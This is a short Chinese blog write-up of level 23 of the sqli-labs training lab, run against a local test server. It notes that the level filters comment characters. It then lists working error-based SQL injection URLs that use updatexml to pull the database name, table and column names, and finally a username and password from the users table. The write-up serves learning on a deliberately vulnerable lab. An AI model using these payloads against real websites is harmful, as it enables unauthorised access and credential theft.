第二十三关
......(其实发现好简单的一关)
就是过滤 #和--
http://127.0.0.1/sqli/Less-23/?id=1‘ and ‘1‘=‘1
http://127.0.0.1/sqli/Less-23/?id=1‘ and updatexml(1,concat(0x7e,(select database()),0x7e),1) and ‘1‘=‘1 #security
http://127.0.0.1/sqli/Less-23/?id=1‘ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security‘ limit 0,1),0x7e),1) and ‘1‘=‘1 #users
http://127.0.0.1/sqli/Less-23/?id=1‘ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=‘users‘ limit 7,1),0x7e),1) and ‘1‘=‘1 #username
http://127.0.0.1/sqli/Less-23/?id=1‘ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=‘users‘ limit 4,1),0x7e),1) and ‘1‘=‘1 #password
http://127.0.0.1/sqli/Less-23/?id=1‘ and updatexml(1,concat(0x7e,(select concat_ws(‘~‘,username,password) from users limit 4,1),0x7e),1) and ‘1‘=‘1 #‘~stupid~stupidity~‘
原文:https://www.cnblogs.com/llcn/p/12751460.html